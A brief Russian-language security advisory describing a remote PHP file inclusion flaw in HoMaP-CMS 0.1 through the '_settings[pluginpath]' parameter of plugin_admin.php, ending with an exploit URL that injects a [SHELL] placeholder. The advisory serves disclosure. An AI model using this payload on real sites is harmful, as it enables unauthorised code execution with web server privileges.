Программа: HoMaP-CMS 0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «_settings[pluginpath]» сценарием plugin_admin.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://localhost/path/html/admin/modules/plugin_admin.php? _settings[pluginpath]=[SHELL]



Оставить мнение